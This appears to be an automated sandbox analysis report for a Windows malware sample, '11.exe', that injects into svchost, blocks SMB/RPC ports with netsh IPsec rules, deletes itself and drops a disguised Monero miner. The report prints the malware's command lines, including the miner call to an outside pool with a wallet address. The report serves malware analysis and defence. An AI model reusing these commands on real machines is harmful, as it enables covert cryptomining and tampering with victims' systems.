Analysis
- max time kernel: 29s
- max time network: 117s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 07-05-2021 13:05

Static task: static1

Behavioral task: behavioral1
- Sample: 11.exe
- Resource: win7v20210410

Behavioral task: behavioral2
- Sample: 11.exe
- Resource: win10v20210410
General
- Target: 11.exe
- Size: 1.4MB
- MD5: 1fc1c860e86a8fbc2021d2567d62f703
- SHA1: 42ea2c9f4548614574dff36e019ae1cbc68b54e3
- SHA256: 76005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306
- SHA512: fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c
Malware Config
Signatures

- Executes dropped EXE (1 IoCs)
  Processes (pid | process):
    3444 | wudfhosts.exe

- Sets DLL path for service in the registry (2 TTPs)
  Resources (resource | yara_rule):
    C:\Windows\Cursors\wudfhosts.exe | upx
    C:\Windows\Cursors\WUDFhosts.exe | upx

- Loads dropped DLL (1 IoCs)
  Processes (pid | process):
    1556 | svchost.exe

- Drops file in System32 directory (6 IoCs)
  Processes (description | ioc | process):
    File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | svchost.exe
    File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | svchost.exe
    File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | svchost.exe
    File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | svchost.exe
    File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | svchost.exe
    File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\Update[1].txt | svchost.exe

- Suspicious use of SetThreadContext (1 IoCs)
  Processes (description | pid | process | target process):
    PID 1556 set thread context of 2448 | 1556 | svchost.exe | svchost.exe

- Drops file in Windows directory (5 IoCs)
  Processes (description | ioc | process):
    File created | C:\Windows\Help\active_desktop_render.dll | 11.exe
    File opened for modification | C:\Windows\Cursors\WUDFhosts.exe | 11.exe
    File created | C:\Windows\Cursors\WUDFhosts.exe | 11.exe
    File created | C:\Windows\Help\active_desktop_render_New.dll | svchost.exe
    File opened for modification | C:\Windows\Help\active_desktop_render.dll | svchost.exe

- Modifies data under HKEY_USERS (8 IoCs)
  Processes (description | ioc | process):
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | svchost.exe
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | svchost.exe
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | svchost.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | svchost.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | svchost.exe
    Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | svchost.exe
    Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | svchost.exe
    Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | svchost.exe

- Suspicious behavior: EnumeratesProcesses (10 IoCs)
  Processes (pid | process):
    2448 | svchost.exe (10 occurrences)

- Suspicious use of AdjustPrivilegeToken (5 IoCs)
  Processes (description | pid | process):
    Token: SeRestorePrivilege | 2448 | svchost.exe
    Token: SeBackupPrivilege | 2448 | svchost.exe
    Token: SeSecurityPrivilege | 2448 | svchost.exe
    Token: SeTakeOwnershipPrivilege | 2448 | svchost.exe
    Token: SeLockMemoryPrivilege | 3444 | wudfhosts.exe

- Suspicious use of SetWindowsHookEx (4 IoCs)
  Processes (pid | process):
    2112 | 11.exe
    1556 | svchost.exe
    2448 | svchost.exe
    2448 | svchost.exe

- Suspicious use of WriteProcessMemory (48 IoCs)
  Processes (description | pid | process | target process), identical rows collapsed with their occurrence count:
    PID 2112 wrote to memory of 1168 | 2112 | 11.exe | netsh.exe (3 occurrences)
    PID 2112 wrote to memory of 2732 | 2112 | 11.exe | netsh.exe (3 occurrences)
    PID 2112 wrote to memory of 3176 | 2112 | 11.exe | netsh.exe (3 occurrences)
    PID 2112 wrote to memory of 2736 | 2112 | 11.exe | netsh.exe (3 occurrences)
    PID 2112 wrote to memory of 3372 | 2112 | 11.exe | netsh.exe (3 occurrences)
    PID 2112 wrote to memory of 3852 | 2112 | 11.exe | netsh.exe (3 occurrences)
    PID 2112 wrote to memory of 1272 | 2112 | 11.exe | netsh.exe (3 occurrences)
    PID 2112 wrote to memory of 752 | 2112 | 11.exe | netsh.exe (3 occurrences)
    PID 2112 wrote to memory of 740 | 2112 | 11.exe | netsh.exe (3 occurrences)
    PID 2112 wrote to memory of 1228 | 2112 | 11.exe | netsh.exe (3 occurrences)
    PID 2112 wrote to memory of 3164 | 2112 | 11.exe | netsh.exe (3 occurrences)
    PID 2112 wrote to memory of 1364 | 2112 | 11.exe | cmd.exe (3 occurrences)
    PID 1556 wrote to memory of 2448 | 1556 | svchost.exe | svchost.exe (10 occurrences)
    PID 2448 wrote to memory of 3444 | 2448 | svchost.exe | wudfhosts.exe (2 occurrences)
Processes

- C:\Users\Admin\AppData\Local\Temp\11.exe
  command line: "C:\Users\Admin\AppData\Local\Temp\11.exe"
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\netsh.exe
    command line: netsh ipsec static add policy name=Block
  - C:\Windows\SysWOW64\netsh.exe
    command line: netsh ipsec static add filterlist name=Filter1
  - C:\Windows\SysWOW64\netsh.exe
    command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
  - C:\Windows\SysWOW64\netsh.exe
    command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
  - C:\Windows\SysWOW64\netsh.exe
    command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
  - C:\Windows\SysWOW64\netsh.exe
    command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
  - C:\Windows\SysWOW64\netsh.exe
    command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
  - C:\Windows\SysWOW64\netsh.exe
    command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
  - C:\Windows\SysWOW64\netsh.exe
    command line: netsh ipsec static add filteraction name=FilteraAtion1 action=block
  - C:\Windows\SysWOW64\netsh.exe
    command line: netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
  - C:\Windows\SysWOW64\netsh.exe
    command line: netsh ipsec static set policy name=Block assign=y
  - C:\Windows\SysWOW64\cmd.exe
    command line: cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\11.exe"

- \??\c:\windows\syswow64\svchost.exe
  command line: c:\windows\syswow64\svchost.exe -k graphicsperf_svcsgroup -s GraphicsPerf_Svcs
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\svchost.exe
    command line: C:\Windows\system32\svchost.exe
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - C:\Windows\Cursors\wudfhosts.exe
      command line: C:\Windows\Cursors\wudfhosts.exe -o xmr.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

- C:\Windows\Cursors\WUDFhosts.exe
  MD5: 4a72e30c0a582b082030adfd8345014f
  SHA1: 2f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353
  SHA256: e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976
  SHA512: 8a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798

- C:\Windows\Cursors\wudfhosts.exe
  MD5: 4a72e30c0a582b082030adfd8345014f
  SHA1: 2f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353
  SHA256: e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976
  SHA512: 8a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798

- \??\c:\windows\help\active_desktop_render.dll
  MD5: 14e2b194b652d4fd912404775a6ae898
  SHA1: e93f529bb61e12c41426cb2b86176bf0af387c09
  SHA256: 24ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c
  SHA512: b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6

- \Windows\Help\active_desktop_render.dll
  MD5: 14e2b194b652d4fd912404775a6ae898
  SHA1: e93f529bb61e12c41426cb2b86176bf0af387c09
  SHA256: 24ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c
  SHA512: b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6

Memory dumps:
- memory/740-122-0x0000000000000000-mapping.dmp
- memory/752-121-0x0000000000000000-mapping.dmp
- memory/1168-114-0x0000000000000000-mapping.dmp
- memory/1228-123-0x0000000000000000-mapping.dmp
- memory/1272-120-0x0000000000000000-mapping.dmp
- memory/1364-126-0x0000000000000000-mapping.dmp
- memory/2448-133-0x0000000010072B6D-mapping.dmp
- memory/2448-128-0x0000000010000000-0x000000001010C000-memory.dmp (Filesize 1.0MB)
- memory/2448-131-0x0000000010000000-0x000000001010C000-memory.dmp (Filesize 1.0MB)
- memory/2448-130-0x0000000010000000-0x000000001010C000-memory.dmp (Filesize 1.0MB)
- memory/2448-136-0x0000000010000000-0x000000001010C000-memory.dmp (Filesize 1.0MB)
- memory/2448-129-0x0000000010000000-0x000000001010C000-memory.dmp (Filesize 1.0MB)
- memory/2732-115-0x0000000000000000-mapping.dmp
- memory/2736-117-0x0000000000000000-mapping.dmp
- memory/3164-124-0x0000000000000000-mapping.dmp
- memory/3176-116-0x0000000000000000-mapping.dmp
- memory/3372-118-0x0000000000000000-mapping.dmp
- memory/3444-138-0x0000000000000000-mapping.dmp
- memory/3444-140-0x000002612B900000-0x000002612B910000-memory.dmp (Filesize 64KB)
- memory/3444-141-0x000002612B920000-0x000002612B930000-memory.dmp (Filesize 64KB)
- memory/3444-143-0x000002612B930000-0x000002612B940000-memory.dmp (Filesize 64KB)
- memory/3444-142-0x000002612B940000-0x000002612B950000-memory.dmp (Filesize 64KB)
- memory/3852-119-0x0000000000000000-mapping.dmp